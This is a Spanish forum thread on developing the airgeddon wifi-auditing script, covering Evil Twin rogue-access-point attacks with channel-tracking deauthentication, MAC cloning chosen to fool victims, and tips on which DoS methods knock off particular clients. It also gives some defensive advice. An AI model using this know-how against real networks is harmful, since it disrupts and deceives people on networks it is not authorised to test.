Para realizar los ataques Evil Twin ya se venía haciendo un trapi, la tarjeta de "desdoblaba" en dos interfaces. Es decir, una misma inferfaz física se volvía dos interfaces lógicas. Una necesaria en modo managed para crear el AP con hostapd y la otra en modo monitor para lanzar el DoS. Bien, pues parece que al hacer esto, si además le añadimos el DoS pursuit mode que escanea en background con airodump, por algún motivo esto está afectando al punto de acceso del hostapd. Hace que se vuelva loco, aparece y desaparece (se cae). Los clientes no pueden conectar bien al AP falso, etc... sin embargo si desactivo el DoS pursuit mode en el Evil Twin todo funciona bien (como siempre).

Intuyo que no se pueden realizar más tareas con una misma interfaz (ya estaba bien no?  ???)y que lo que me tocará hacer será que tras preguntar en el Evil Twin si quieres activar el DoS pursuit mode, si le decimos que sí, pues tendrás que indicarle otro interfaz en modo monitor para poder hacer el DoS en pursuit mode integrado en Evil Twin o me temo que no será posible. ¿como lo veis? es que no se me ocurre nada más para solucionarlo.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 04-11-2017, 15:35 (Sábado)
Estoy haciendo pruebas con una segunda tarjeta, poniéndolo "hardcoded" en el script para probar... y así lanzar el DoS con una segunda tarjeta física en monitor y me sigue pasando lo mismo!  ??? no lo entiendo... hay algo que se me está escapando...

¿Por qué al activar el DoS pursuit mode afecta al hostapd? ¿incluso si el DoS lo lanzo con otra tarjeta física distinta? esto no tiene sentido... no estoy viendo algo.


Fallo mío, con otra tarjeta física funciona bien.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 04-11-2017, 15:52 (Sábado)
Entonces no entendí, ¿funciona o no funciona?
Creo que aquellos que están investigando redes wifi tienen varios adaptadores. Entonces, si puede hacer con dos adaptadores, entonces déjelo con dos adaptadores. La idea en sí es muy valiosa. Dado que muchas estaciones saltan de un canal a otro.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 05-11-2017, 14:47 (Domingo)
Funciona en el apartado de DoS, pero no funciona en los Evil Twin attacks. Para que funcione en los Evil Twin attacks tengo que implementar que el DoS se haga con otro interfaz wifi en modo monitor. Implementar esto me llevará tiempo ya que quiero hacerlo bien, con un menú de selección de interfaz cuando se active la opción y demás. Como siempre, se tarda más en preparar la parafernalia, las validaciones y todo eso que lo que es el ataque en sí mismo.

Esto va para largo... paciencia.

Y bueno, he estado indagando sobre el motivo por el cual ocurre esto y no funciona con un solo interfaz. Pongo por aquí la explicación por si le sirve a alguien:

Al final la respuesta es simple: un solo adaptador no puede actuar en dos canales diferentes a la vez. El hecho de que de un interfaz físico se hagan dos lógicos no quita que ambos interfaces deban operar en el mismo canal. Por eso en el ataque Evil Twin sin DoS pursuit mode funciona bien, porque creas el AP con hostapd en el canal X y luego el DoS lo lanzas sobre el mismo canal pero contra el BSSID del objetivo. Pero al activar el DoS pursuit mode, como hay un airodump de fondo que va cambiando el canal para escanear, pues eso hace que durante esos saltos, el hostapd falle y es por eso que el AP falso desaparece a ratos, y aparece de vez en cuando cuando coincide que el salto de airodump está en el mismo canal en el que está configurado hostapd.

Lo dicho, lo implementaré... pero para poder hacer DoS pursuit mode en los Evil Twin hará falta otra tarjeta en modo monitor... y tendrá su pantalla para seleccionarla y todo lo necesario. Sí que se ha complicado la cosa...
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 05-11-2017, 16:28 (Domingo)
Esperaremos con impaciencia. Intenté con dos ventanas del programa y dos adaptadores para trabajar. Uno tiene que tener en cuenta una cosa, que si se recibe la contraseña, ambos ataques se detendrían. Cuando se trabaja con dos ventanas, el ataque del modo de persecución DoS continúa funcionando.
Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 07-11-2017, 18:47 (Martes)
 ???
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 07-11-2017, 23:58 (Martes)
¿Qué significa  ??? ?

Viste los commits del proyecto? https://github.com/v1s1t0r1sh3r3/airgeddon/commits/dev (https://github.com/v1s1t0r1sh3r3/airgeddon/commits/dev)

No he parado de trabajar en el asunto... han pasado dos días desde que dije que estaba con ello. Solo tomé  un día de descanso, que ayer no hice ningún commit. ¿Te parece que esté abandonado?

Estoy teniendo que refactorizar funciones y abstraer métodos para poderlos reutilizar sin duplicar código, no está siendo nada fácil. De verdad que cuanta más presión metas más voy a tardar. Tranquilo que se hará porque ya lo tengo enfocado y yo no suelo dejar cosas a medias, pero no me presiones porque tengo una vida (bueno, más o menos  >:D ).

Desde luego, que es la última vez que accedo a hacer desarrollos "a la carta" o "a medida". Acepto sugerencias, pero no exigencias... pedir sí se nos da bien... pero donar para soportar el proyecto... eso ya no tanto ¿no? Jeje, bueno pues pensaba darle otro apretón al asunto esta noche, pero igual me la tomo libre también que me ha tocado la fibra el asunto.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: 5.1 en 08-11-2017, 00:39 (Miércoles)
¿Qué significa  ??? ?

Viste los commits del proyecto? https://github.com/v1s1t0r1sh3r3/airgeddon/commits/dev (https://github.com/v1s1t0r1sh3r3/airgeddon/commits/dev)

No he parado de trabajar en el asunto... han pasado dos días desde que dije que estaba con ello. Solo tomé  un día de descanso, que ayer no hice ningún commit. ¿Te parece que esté abandonado?

Estoy teniendo que refactorizar funciones y abstraer métodos para poderlos reutilizar sin duplicar código, no está siendo nada fácil. De verdad que cuanta más presión metas más voy a tardar. Tranquilo que se hará porque ya lo tengo enfocado y yo no suelo dejar cosas a medias, pero no me presiones porque tengo una vida (bueno, más o menos  >:D ).

Desde luego, que es la última vez que accedo a hacer desarrollos "a la carta" o "a medida". Acepto sugerencias, pero no exigencias... pedir sí se nos da bien... pero donar para soportar el proyecto... eso ya no tanto ¿no? Jeje, bueno pues pensaba darle otro apretón al asunto esta noche, pero igual me la tomo libre también que me ha tocado la fibra el asunto.

Qué paciencia tienes v1s1t0r, se nota que llevas relativamente poco por aquí. Son por usuarios tipo este por lo que a uno se le quitan las ganas de publicar nada y mira que yo he publicado bastantes cosas, pero llega un punto que uno se harta.
Haz las cosas cuando te apetezcan y pq te apetezcan, pasa de este tipo de usuarios pq te quitarán las ganas.

Suerte y ánimo.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: juandiegomu en 08-11-2017, 19:16 (Miércoles)
v1s1t0r,tu a tu marcha si tiene prisa,que eche a  correr  ;D ;D ,un saludo
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 09-11-2017, 12:30 (Jueves)
Ala, terminado! ya está el DoS pursuit mode integrado en los Evil Twin. Cuando te pregunta si lo quieres activar (te avisa de que necesitarás otro interfaz wifi adicional), aparece un menú intermedio para seleccionarlo. Lo he probado todo y funciona de lujo! ya me diréis que tal.

Bueno, está disponible en la 7.23 de la rama de desarrollo del github. Ya sabéis: git clone -b dev https://github.com/v1s1t0r1sh3r3/airgeddon.git

Ahora esperar más testing, feedback, traducciones y calculo que de aquí a un mes más o menos estará en master (es lo que suele tardar la traducción a todos esos idiomas)... mientras comenzaré un nuevo branch para la futura versión 8 de airgeddon que tendrá soporte para 5ghz ya que me ha llegado por fin el Alfa nuevo que lo soporta.

Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 09-11-2017, 13:17 (Jueves)
Gracias
¿Qué adaptadores usaste para las pruebas? Esta noche, voy a probar. Después de las pruebas, escribiré.

Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: aonady3000 en 09-11-2017, 14:32 (Jueves)
buenas tardes, soy usuario antiguo de wifislax version 4.9 y 4.12 pues me parecienron distros estables y buen logradas.

hace 16 dias me cambie a la ultima version de 64 bits y la estube probando y encontre maravillas como este buen script

pero lo que no entiendo es el confusion attack del airgeddon, es decir, en que consiste, en que me ayuda en la seguridad de mi red, como se si soy vulnerable con este script, como se cuendo encuentra una vulnerabilidad y sobre todo si con ella puedo Auditar mi pass o alguien mas puede acerlo.

se que son muchas preguntas, pero es que soy nuevo en el mundo del wifislax 64 bits.

agradezco su colaboracion.

gracias.

ADONAY3000
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 09-11-2017, 15:05 (Jueves)
Nesight1957 , los adaptadores que usé son un Alfa AWUS052NHS (chipset RT3572) y un Alfa AWUS036NHA (chipset Atheros AR9271). También lo he probado con otra Alfa que tengo AWUS036NH con chipset Ralink RT3070. También he probado todas las combinaciones entre estos adaptadores (para el ataque solo hacen falta dos), y todas funcionan bien.

Realmente lo único que hacen las tarjetas es lanzar DoS en modo monitor y una de ellas crear un AP con hostapd en modo managed-master. Funcionará con cualquier tarjeta que soporte bien el cambio de modo con airmon. No hace falta nada especial.

adonay3000, el ataque WDS confusion es un tipo de ataque DoS (Denial of Service o Denegación de Servicio en Español), basado en la herramienta mdk3. Este ataque, sin entrar en detalles técnicos, es uno de tantos que hay disponibles y sirve para impedir que los clientes puedan utilizar con normalidad la red wifi objetivo. Si lo que quieres es impedir que una red wifi se pueda usar, pues has de lanzar un ataque DoS del menú de DoS. Si lo que quieres es lanzar un Evil Twin, imagino que sabrás que una parte de este ataque es lanzar DoS contra la red legítima mientras se crea una falsa con similares características. Bien, pues el WDS confusion es un ataque DoS más. Lo suyo es que lo pruebes con tu red y compruebes que te deja fuera de combate la red. Si no funciona bien, pues simplemente utiliza otro ataque DoS. Hay veces que un mismo ataque DoS afecta a unos puntos de acceso y a otros no. Incluso puede afectar a unos clientes del punto de acceso y a otros no estando conectados al mismo punto de acceso.

Por experiencia personal, por ejemplo los clientes android caen muy rápido de las redes con el ataque DoS de aireplay. Sin embargo, con ese ataque no conseguía tirar un cliente de Windows cuya antena era un Alfa. El ataque que afectaba a este cliente Windows y que lo dejaba K.O. al instante era el de mdk3 amok.

En resumen, has de ir probando los resultados (esto no es una ciencia exacta) y adaptar tu tipo de ataque al AP y clientes objetivo.

En cuanto a si eres vulnerable con este script... bueno, todos lo somos un poco. Cualquiera puede hacer un DoS contra nuestro punto de acceso y dejarlo fuera de combate. Las recomendaciones de seguridad son las de siempre:

- Desactivar el WPS de nuestro AP.
- Utilizar WPA2 que pese al nuevo ataque KRACK sigue siendo la mejor opción.
- Utilizar una contraseña robusta y larga (mayúsculas, minúsculas, números y y símbolos), que no esté en ningún diccionario. Es decir, que sea algo inventado.
- No caer en la trampa si ves tu AP duplicado o una red parecida a la tuya que te pide algún tipo de contraseña (ya sea para conectar a la red o en un portal cautivo).

Espero haberte ayudado. Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 10-11-2017, 07:07 (Viernes)
Ayer probé el guión. Hubo preguntas ¿La ventana de ataque del modo de ataque DoS debería ser o no? No tuve, no está claro si está trabajando en este momento o no. Me refiero al ataque del modo de persecución DoS en Evil Twin.

Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 10-11-2017, 07:30 (Viernes)
Hola, me temo que el traductor automático aquí no está funcionando bien. No tengo muy claro lo que estás preguntando.

La ventana de DoS es la misma (título y aspecto) en el DoS normal y en el DoS pursuit mode. Igual podría poner en el título de la ventana que está el pursuit mode activado... sería muy fácil de hacer, de hecho lo haré porque es muy sencillo.

Entiendo que todo funciona bien.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 10-11-2017, 07:42 (Viernes)
En Evil Twin no hay una ventana de DoS pursuit mode. No está claro funciona o no. Me gustaría ver la ventana de ataque de DoS pursuit mode.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 10-11-2017, 07:55 (Viernes)
Acabo de hacer un commit. Ahora en la ventana DoS pone en el título "(DoS Pursuit mode)" si se activó esta opción. Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 10-11-2017, 08:33 (Viernes)
Gracias. Probaremos.

Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: calzedonia en 15-11-2017, 07:56 (Miércoles)
Hola compi, en primer lugar felicitarte por el fabuloso script. Buena currada, gracias!!!. Te queria preguntar. En este script ya esta contemplado lo de cuando un router cambia de canal para el evil twin, y si es asi que hace. Te lo comento porque ayer hice yo una prueba en mi red vodafone que cada poco tiempo esta cambiando del canal 1 al 11 y se quedaron todas las pantallas igual, sin movimiento alguno. Ya me explicas un poco. Gracias y saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 15-11-2017, 10:01 (Miércoles)
Hola sí, para empezar, esta funcionalidad está disponible solo en la versión 7.23 que aún no está en la rama master del proyecto y por lo tanto no se os actualizará automáticamente. La actualización automática llega de momento hasta la versión 7.22 . El día que lo pase a master se os actualizará a todos. Calculo que será a primeros de diciembre como mucho.

No obstante, si lo quieres probar ya, te puedes clonar el proyecto desde github en la rama "dev" que es la de desarrollo (development). Se hace con el comando: git clone -b dev https://github.com/v1s1t0r1sh3r3/airgeddon.git

Una vez lo hayas lanzado, cuando lances un ataque Evil Twin, te preguntará si quieres activar el modo persecución DoS. Tendrás que decirle que sí. Es este modo el que escanea en segundo plano y detecta un posible cambio de canal. Para ello además hace falta otro interfaz wifi adicional. Es decir, que para poderlo lanzar necesitas tener dos tarjetas wifi compatibles con modo monitor. El script te preguntará todo, y te mostrará un menú para elegir esta tarjeta adicional y hará las validaciones pertinentes, etc.

¿Como sabrás tú si está funcionando? bien, pues además de que la ventana de DoS se cierra y se abre de nuevo al relanzar el ataque (cosa que es poco probable que veas si no estás atento justo en el momento del cambio), en la ventana principal del script (esa que se queda un poco como en segundo plano detrás de todo y en la que tienes que pulsar Enter para finalizar el ataque), ahí verás un mensaje que te indica que se ha detectado un cambio de canal y que el ataque DoS se ha relanzado además de indicarte el nuevo canal en el que opera.

Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: calzedonia en 21-11-2017, 20:10 (Martes)
Gracias por la explicacion. Solo me queda una duda. En el modo de persecucion Do
S, entiendo que la tarjeta que creara el ap falso sera la primera con la que hemos sacado el handshake, y cuando te pregunta si quieres utilizar otra tarjeta para la persecucion DoS, esa otra seria la que crearia el nuevo ap falso en caso de cambio de canal. Es asi? Lo comento  porque la primera tarjeta que tengo es la de una alfa de exterior ubdo - nt8. y la segunda seria la tarjeta integrada del portatil. Entonces la pregunta es, como esta segunda es la que siempre pongo por si cambia de canal, esta tiene muy poco alcance , dando por supuesto que no llegaria a los clientes en cuestion. Ya me comentas. Gracias y saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 21-11-2017, 22:27 (Martes)
La primera tarjeta se usa para sacar el handshake y es la primera también la que creará el AP (va cambiando el modo). Luego la segunda es la que hace el DoS. Lo que lleguen ya las tarjetas ya es cosa de las tarjetas, y que tú las selecciones en un orden u otro ya es cosa tuya.

Mi consejo es que las dos sean potentes o si no, podrías crear un AP con buena señal, pero si el DoS no llega bien y sus clientes no caen, jamás caerán en tu red falsa. Por el contrario, si la antena potente es la que hace el DoS y les tiras, pero luego tu AP apenas tiene señal y sus clientes no van a poder conectarse a tí, pues estás en las mismas solo que haciendo un DoS. Así que dos tarjetas buenas hay que tener siempre en mi opinión.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: calzedonia en 22-11-2017, 04:52 (Miércoles)
Gracias compi. Todo perfectamente claro. Mi caso ya lo tengo claro. La primera tarjeta, osea la buena alfa si que tira mucho y da buena señal al Ap, pero la segunda integrada en placa del portatil evidentemente tira muchisimo menos y no debe llegar bien el DoS, ahi esta la cuestion. Por lo que veo estaba equivocado en el funcionamiento, pensando que laprimera tarjeta montaba el ap y hacia el DoS, y si habia cambio de canal , entonces hacia el DoS la segunda tarjeta. Por lo que sobreentiendo que una misma tarjeta no puede estar con el ap montado y haciendo el DoS a la vez. Gracias por tu paciencia y enhorabuena por tu script. Imagino que no tardaremos en tener la 7.23 en Master. Saludossss!!!
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 22-11-2017, 22:46 (Miércoles)
Una sola tarjeta puede hacer de AP y el DoS a la vez sin el "pursuit mode". Sin este modo, desdoblamos la tarjeta física en dos interfaces lógicas y una hace de AP en modo managed-master y la otra en modo monitor hace el DoS. ¿Por qué funciona esto? porque todo está en el mismo canal. La cosa es que tú puedes crear todos los interfaces lógicos que quieras, pero la realidad es que solo hay una antena física y eso hace que solo puedas operar en un canal a la vez. Por eso en el Evil Twin normal sin "pursuit mode" se puede hacer perfectamente con una, porque la desdoblamos y una crea el ap y otra hace el DoS... todo en el mismo canal, y el DoS no nos afecta a nosotros mismos (nuestro falso AP) aunque todo esté en el mismo canal (falso AP, AP víctima y DoS) porque va dirigido a un a mac específica que es el bssid de la víctima... nuestro AP clonado tiene casi la misma mac. Es toda igual excepto un dígito del medio. Lo elegí así porque las tres primeras parejas de dígitos hex de la mac son el vendor e indican el fabricante... ahí no iba a cambiar nada claro, y los últimos son los que igual el usuario-víctima podría recordar... así que la mejor opción era bailar uno de por en medio y asunto arreglado.

En cambio en el "pursuit mode", además de lanzar el DoS hay un airodump escaneando en background que va saltando de canal... es por eso que ha de ser otra tarjeta porque si no, cuando va cambiando de canal escaneando en busca de posibles cambios de canal del AP víctima el AP se caería si se hiciera con la misma tarjeta que hace el DoS. Y el DoS de hecho se está "cayendo" también de vez en cuando con esos saltos lo que pasa es que en un DoS es asumible... ahora le tiras, ahora no, ahora le tiras y ahora no... el resultado es que la víctima se cae de vez en cuando igualmente y no puede trabajar... es cierto que en "pursuit mode" el DoS es menos potente por esto, pero os aseguro que funciona igual. Sin embargo en el falso AP no puede haber caídas o la víctima que intenta conectar a él se caería de nuestro falso AP y no funcionaría el ataque. Por eso el escaneo en background de airodump ha de ser en otra tarjeta que no sea la que hace de AP.

Se que esto es una movida, no se si lo habré explicado bien, espero que se entienda. Es la explicación de por qué se puede hacer en una tarjeta en el Evil Twin en modo normal y por qué hacen falta dos en el "pursuit mode".

Por otra parte, está la sección de DoS (no el DoS integrado de los Evil Twin). Aquí también se hace solo con una ya que no hay que crear AP ni nada.

Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: calzedonia en 24-11-2017, 05:46 (Viernes)
Gracias compi, la verdad que si es una movida como tu comentas, pero con tu explicacion he entendido. No hay nada como leer bien lo que te explican y practicarlo. Lo puse en practica con mi router y te queria preguntar. Estuve pendiente del proceso y primero estaba en el canal 1 y despues cambio al canal 11, y efectivamente en la pantalla de detras de todas las que abren, si que me informo del cambio de canal y de hecho tambien llegue a ver el cambio en la ventana del DoS. En la ventana de arriba-derecha, en donde sale los intentos me seguia poniendo canal 1 despues del cambio de canal, esto es normal no?, sera porque es donde empezo. Ya me comentas. Gracias y saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 24-11-2017, 07:15 (Viernes)
Sí, es así. Te da la info inicial del ataque en la ventana de control del Evil Twin, aunque el canal cambie 20 veces. Como viste funciona de lujo avisándote de los cambios en la ventana principal!  ;D
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 28-11-2017, 09:19 (Martes)
Buenas tardes v1s1t0r.
Al salir el adaptador de "pursuit mode" no se traduce en el modo administrado y no se cierra el script.

Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 28-11-2017, 09:21 (Martes)
No comprendo. A mi me funciona bien, pulsas Enter en la pantalla principal de Evil Twin y se cierra todo. Si crees que hay un problema vas a tener que dar más detalles.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 28-11-2017, 09:32 (Martes)
Cuando presiono Enter, el programa le pregunta a dejar el adaptador en modo Monitor o poner en mode Managed, presiono y se traduce sólo un adaptador en modo Managed mode.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 28-11-2017, 09:39 (Martes)
Cuando presionas Enter el script no pregunta nada, así que no lo entiendo. Simplemente cierra todo y te devuelve el interfaz principal al estado original, y el interfaz adicional del "pursuit mode" no lo toca, así que te lo deja en modo monitor.

Graba un vídeo o algo similar porque no nos estamos entendiendo. El idioma es un problema desde luego. Esto es un foro en español y de verdad que perdemos mucho tiempo todos intentando entenderte.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 28-11-2017, 09:46 (Martes)
Me refiero a la salida de un script, y no de régimen. Sigue siendo un adaptador en modo Monitor mode. Si y ahora no está claro, entonces, anotaré de vídeo.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 08-02-2018, 12:23 (Jueves)
Hola, acabo de terminar la versión 8.0 de airgeddon. Esta tiene soporte para redes 5ghz. Ahora mismo está en testing y a falta de algunas traducciones, pero ya se puede descargar y probar desde la rama dev del proyecto. Ya sabéis como va... git clone -b dev https://github.com/v1s1t0r1sh3r3/airgeddon.git

Estaría bien que alguien lo probara un poco. Pasará a master y se os actualizará en breve.

Gracias.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: trasto90 en 10-02-2018, 13:37 (Sábado)
Una buena noticia lo del soporte de 5ghz. Se agradece.
Solo un apunte sobre esto. Me he encontrado situaciones en los que los clientes de la red tienen introducidas las 2 redes en su dispositivo. Quiero decir que tienen memorizada la red de 2.4 y la de 5. Se conectan a la voluntad del móvil(por ejemplo). Si intentas algo por la de 2.4 y no puede conectar en esa, se va a la de 5ghz automáticamente sin enterarse. Viendo que ahora podemos hacer algo en la de 5ghz y no se puede conectar a ella,  se ira automáticamente a la de 2.4
Creo que en algún caso concreto el intentar algo en la de 2.4  provocó que se fuera y configurara la de 5ghz para conectarse.

La única solución que veo es hacer algo a la vez sobre las 2 redes. ¿2 portátiles, 2 dispositivos wifis?
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 10-02-2018, 13:59 (Sábado)
Exacto, tendrías q lanzar dos DoS con dos tarjetas distintas ya que cada tarjeta solo tiene una antena y solo puede operar en un canal a la vez. Podrías por ejemplo lanzar airgeddon con un Evil Twin en un canal y con otra tarjeta hacer un DoS a su otro canal en la otra banda.

Bueno, pues id probándolo, es el momento de hacer algún cambio de última hora si es preciso, aunque creo que está bastante sólido el asunto...

La verdad es que he tenido bastantes problemas con los drivers y demás... sobre todo con airodump, q me mostraba -1 en los canales de 5ghz hasta que di con una combinación adecuada de drivers para mi Ralink RT3572.

Saludos!
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 20-02-2018, 08:21 (Martes)
Versión 8.0 de airgeddon lanzada a master!!

Ya tenéis disponible el soporte de 5ghz. También ha habido una gran actualización de pines wps en la base de datos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 21-02-2018, 01:30 (Miércoles)
Holas , el script de pines conocidos, deberia llevar tambien algun control de version , por que si ,..el script y los lenguajes se autoactualizan , pero el fichero de pines NO , hay que hacerlo a manopla.

 ;)
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 21-02-2018, 10:11 (Miércoles)
Para no escanear los puntos de acceso cada vez después de intentos fallidos, ingrese el punto de retorno a la lista escaneada de puntos de acceso.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 21-02-2018, 11:05 (Miércoles)
Hola USUARIONUEVO. El control de versiones de los pines wps se hace mediante hashing. airgeddon automáticamente detecta si tu fichero de pines es el más actualizado o no, y si no lo es se conecta y descarga automáticamente la última versión.

De hecho, está hecho así a propósito para que los colaboradores puedan actualizar el fichero de base de datos de pines de manera independiente de airgeddon. Pero vamos, que esto no es algo nuevo de esta versión. Eso está así desde los inicios de la base de datos de pines.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 21-02-2018, 21:38 (Miércoles)
Al arrancar el script y el languaje-strings se actualizaron...el pin-db no.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 21-02-2018, 23:33 (Miércoles)
Si, porque el de los pines solo se actualiza si se va a usar. Es decir, al lanzar un ataque de bbdd de pines de wps te hace la comprobación y si no tienes la última bbdd se la baja. El de language strings es que no hay más remedio  ;D se que tampoco es que ahorre mucho, pero si hay alguien que no lo usa pues se ahorra el proceso y el tiempo. No se, son pequeños detallitos chorras que creo que hacen la experiencia de usuario algo mejor... aunque tampoco es importante. Pero gracias por los apuntes! me gusta ver que hay alguien a quien le interesa que funcione bien la cosa!  >:(
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 21-02-2018, 23:38 (Miércoles)
Si, porque el de los pines solo se actualiza si se va a usar. Es decir, al lanzar un ataque de bbdd de pines de wps te hace la comprobación y si no tienes la última bbdd se la baja. El de language strings es que no hay más remedio  ;D se que tampoco es que ahorre mucho, pero si hay alguien que no lo usa pues se ahorra el proceso y el tiempo. No se, son pequeños detallitos chorras que creo que hacen la experiencia de usuario algo mejor... aunque tampoco es importante. Pero gracias por los apuntes! me gusta ver que hay alguien a quien le interesa que funcione bien la cosa!  >:(

Me di cuenta de casualidad al actualizar del 7.23 al 8.0 en la iso ... vi que se actualizaron los scripts principales pero comentabas en los cambios que trasteaste el db , y me extraño que no se actualizara, ..hay me di cuenta,

Creo que es un error como lo planteas ... cuando se va a usar el pin-db , seguramente ya estamos sin internet  ;D

Creo el proceso de update deberia ser todo de una ... al comienzo.

Si tu tienes wlan0 , y la pasa a monitor , en algunos sistemas ya pasara a ser wlan0mon ... y no tendra acceso a internet ... por lo que actualizar el pin-db cuando vayas a usarlo ,ya va a ser mission imposible.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 21-02-2018, 23:43 (Miércoles)
Ostras! pues no lo había pensado así... como siempre actualizo desde casa y con conexión a internet... lo q pasa es q me jodes vivo para cambiar eso ahora, jajaja...

No obstante, por supuesto los errores están controlados como ya imaginaréis y si no hay conexión a internet pues te lo dice q no puede conectarse y tal...

bueno, se puede mirar.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 25-02-2018, 11:21 (Domingo)
Hecho! para la siguiente version 8.01 ahora la base de datos de pines de wps se actualiza también cuando el script se actualiza! He aquí el commit: https://github.com/v1s1t0r1sh3r3/airgeddon/commit/a5df5a9f10a12a676170db5d86a6372c07cd081f
Título: Re: Script multiuso en bash, airgeddon
Publicado por: trasto90 en 09-03-2018, 12:26 (Viernes)
Hola, creo que al final compraré para soporte 5ghz la tarjeta Alfa AWUS052NHS con chipset Ralink RT3572: https://www.alfa.com.tw/products_show.php?pc=67&ps=231 (https://www.alfa.com.tw/products_show.php?pc=67&ps=231)

¿Experiencias? ¿la tiene alguien? ¿pasa a monitor sin problemas? ¿funciona con los O.S típicos de pentest como Wifislax, Kali u otros? ¿funciona con reaver/bully? si alguien pudiera compartir su experiencia sería genial. Gracias.

¿Cómo va con esta tarjeta? ¿ funciona en todos los canales en 5ghz? ¿qué tal la experiencia en esa banda?
Y ya que estoy pregunto también esto. Me gustaria "jugar" un poco en 5ghz pero tampoco queria gastar mucho. No quiero lo mejor para largas distancias o algo así. Solo es para probar o "jugar" con mi red. He visto algo económico con el mismo chip Ralink RT3572 pero con una L al final Ralink RT3572L ¿me servirá igual? ¿alguien tiene algo con la L?
Un saludo
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 09-03-2018, 18:55 (Viernes)
Hola pues la experiencia de comprar ese chipset está siendo buena. Además, al ser una tarjeta compatible con airmon pues se puede usar con airgeddon, porque hay muchas tarjetas muy buenas también pero que al no ser compatibles con airmon pues es un problema porque tienes que estar poniéndolas en modo monitor a mano antes de abrir el script, además de que luego no puedes usar los ataques más complejos tipo Evil Twin en los que se necesita que el script cambie el modo de la tarjeta, pero con esta fue bien.

Igual es una cosa que podría implementar en airgeddon... currarme la compatibilidad con tarjetas que no sean compatibles con airmon... sabemos que poderse se puede. Los tres comanditos de turno para cambiar el modo no son el problema realmente. El problema es saber cuando tienes que hacerlos. Es decir, detectar que tu tarjeta no es compatible con airmon y crear el método "alternativo" este de cambio de modo (ifconfig wlan0 down , iwconfig wlan0 mode monitor, ifconfig wlan0 up).

Respecto a lo que preguntas de la L al final del chipset no te puedo decir, porque no lo conozco ni lo he probado ni se decirte la diferencia, sorry.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: susaniita en 23-03-2018, 17:38 (Viernes)
alguien sabe porque en kali el ataque twin evil con portal cautivo
y dando internet no funciona, se desconecta network manager
y así es imposible dar internet
he probado con muchas tarjetas wifi realtek, ralink, ubiquity
y con todas el mismo problema
cosa q no ocurre en wifislax64 1.1

podría ser problema de la versión del aircrack?
podría ser del airgeddon  para kali?
cosa de airmon?
aiegeddon de kali llamada a airmon-ng?

el caso es q uso 3 tarjetas wireless y la pci integrada wireless
para realizar los ataques y solo pasa en la versión de kali
pruebas con kali2018weekly64 y wifislax64-1.1 en disco duro?
tendría q tocar el script del de kali para q funcione como con wifislax?
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 02-04-2018, 00:56 (Lunes)
Hola, acabo de sacar la versión 8.01 de airgeddon.

Acabo de ver tu post susaniita... veo que es un poco lo mismo que preguntas en el otro foro... y ya te contesté alli.

Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: susaniita en 02-04-2018, 14:38 (Lunes)
Hola, acabo de sacar la versión 8.01 de airgeddon.

Acabo de ver tu post susaniita... veo que es un poco lo mismo que preguntas en el otro foro... y ya te contesté alli.

Saludos.


gracias @v1s1t0r, intentare actualizar quizas en network manager del kali weekly
Título: Re:Script multiuso en bash, airgeddon
Publicado por: byzzarul77 en 13-07-2018, 11:53 (Viernes)

hola. Don v1s1t0r  dar un simple gracias por tu imenso trabajo me da hasta verguenza.Don USUARIONUEVO es otro que no para.Los dos soys personas admirables por vuestro trabajo y come coco que teneis para sadisfacer hasta al mas novato en ese mundo.Yo anque supiera tanto como ustedes no creo que fuera sido tan generoso.os admiro mucho y os doy la gracias por todo lo que haceis
Título: Re: Script multiuso en bash, airgeddon
